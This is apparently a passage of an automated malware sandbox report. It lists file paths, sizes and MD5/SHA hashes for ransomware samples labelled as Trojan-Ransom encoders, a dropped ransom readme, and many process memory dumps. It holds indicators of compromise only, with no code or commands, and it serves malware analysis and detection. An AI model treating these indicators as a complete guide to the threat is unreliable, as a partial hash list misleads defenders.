                              ddf64fafbaff44d4127d2c42f534896c706ce13618a287d3c682c6395fa92d74adac99bde6d0a8565515484a9069feab425407a7f0951db5be6d0e92ee2f2329

                            • F:\$RECYCLE.BIN\S-1-5-21-3227495264-2217614367-4027411560-1000\Readme.README

                              Filesize

                              532B

                              MD5

                              25994370ef89a0cd17b390e9af744b53

                              SHA1

                              401a759d64989ab570e5abca8eb4f1c4c30764e5

                              SHA256

                              7a64e7f617de76ac498b7e0543c9992b666dce032725c25ba0abdfaf1ef8feb9

                              SHA512

                              a2a705c9d58fb5f2e9e49a014da1b65a27670e616c4a53fb7c048a9d14d409d5dbc58202ccd87eb2dbad4d412b9c0d73eb50945b9838e1b812f90609e10fd25a

                            • \??\c:\users\admin\desktop\00403\heur-trojan-ransom.msil.encoder.gen-6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab.exe

                              Filesize

                              878KB

                              MD5

                              ea9c0a193eb474d8aac552ccd65ce047

                              SHA1

                              d88dd3fcb954b2c33b51a588784b1db9b23bae85

                              SHA256

                              6b2e96651e30d4c22ea6a684a859bbdd04872b6a8c7b28c42d3664a8c5e290ab

                              SHA512

                              c0c7dd5b3ca0199562dfd46bc0ea0570fdd0800d34c1fd595a272198e6372e7dccb1ebeeb000da88d24c42af3d48f44eb2f6f6fdae7cd555d4228ede50ba280a

                            • \??\c:\users\admin\desktop\00403\heur-trojan-ransom.win32.foreign.vho-c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f.exe

                              Filesize

                              8.1MB

                              MD5

                              b55973a0a834c70064148209b9302d59

                              SHA1

                              6945159ac7c97fc629eee9ec738cb69d34c5b6ca

                              SHA256

                              c3aa5acfc410447b8295039ab0721db78b4cc2a0f9773e63c3afbf2d98e57f2f

                              SHA512

                              bf4470b250406f45c12a9043c0e86528117e9dac149a0a9a234dd663926115b109926fa04ec1373586db627789a0f8c11a866e58f5a823f67d15d4b8334c583a

                            • memory/648-103-0x0000000000340000-0x00000000016FC000-memory.dmp

                              Filesize

                              19.7MB

                            • memory/1264-241-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-250-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-42231-0x0000000000400000-0x0000000000782000-memory.dmp

                              Filesize

                              3.5MB

                            • memory/1264-145-0x0000000000400000-0x0000000000782000-memory.dmp

                              Filesize

                              3.5MB

                            • memory/1264-1145-0x0000000000400000-0x0000000000782000-memory.dmp

                              Filesize

                              3.5MB

                            • memory/1264-256-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-254-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-252-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-248-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-246-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-244-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-242-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-258-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-238-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-236-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-234-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-232-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-230-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-229-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-226-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-225-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1264-223-0x0000000010000000-0x000000001003D000-memory.dmp

                              Filesize

                              244KB

                            • memory/1312-48-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-50-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-49-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-44-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-43-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-42-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-54-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-51-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-53-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/1312-52-0x000002637CFC0000-0x000002637CFC1000-memory.dmp

                              Filesize

                              4KB

                            • memory/2592-81-0x00000295B4B70000-0x00000295B4B92000-memory.dmp

                              Filesize

                              136KB

                            • memory/2592-83-0x00000295B5000000-0x00000295B5076000-memory.dmp

                              Filesize

                              472KB

                            • memory/2592-86-0x00000295B4FC0000-0x00000295B4FDE000-memory.dmp

                              Filesize

                              120KB

                            • memory/2592-82-0x00000295B4F30000-0x00000295B4F74000-memory.dmp

                              Filesize

                              272KB

                            • memory/2592-89-0x00000295B4850000-0x00000295B4A6C000-memory.dmp

                              Filesize

                              2.1MB

                            • memory/3448-139-0x00000000006F0000-0x0000000000707000-memory.dmp

                              Filesize

                              92KB

                            • memory/3448-138-0x0000000000400000-0x0000000000460000-memory.dmp

                              Filesize

                              384KB

                            • memory/5444-6726-0x000000001C190000-0x000000001C1A2000-memory.dmp

                              Filesize

                              72KB

                            • memory/5444-7464-0x000000001CAA0000-0x000000001DE4A000-memory.dmp

                              Filesize

                              19.7MB

                            • memory/5520-1034-0x0000000005AE0000-0x0000000005B22000-memory.dmp

                              Filesize

                              264KB

                            • memory/5520-996-0x0000000002E20000-0x0000000002E64000-memory.dmp

                              Filesize

                              272KB

                            • memory/5520-1031-0x0000000005530000-0x0000000005AD4000-memory.dmp

                              Filesize

                              5.6MB

                            • memory/5520-1141-0x0000000005B30000-0x0000000005BC2000-memory.dmp

                              Filesize

                              584KB

                            • memory/5520-1147-0x0000000005DE0000-0x0000000005E00000-memory.dmp

                              Filesize

                              128KB

                            • memory/5520-1146-0x0000000005C50000-0x0000000005C5A000-memory.dmp

                              Filesize

                              40KB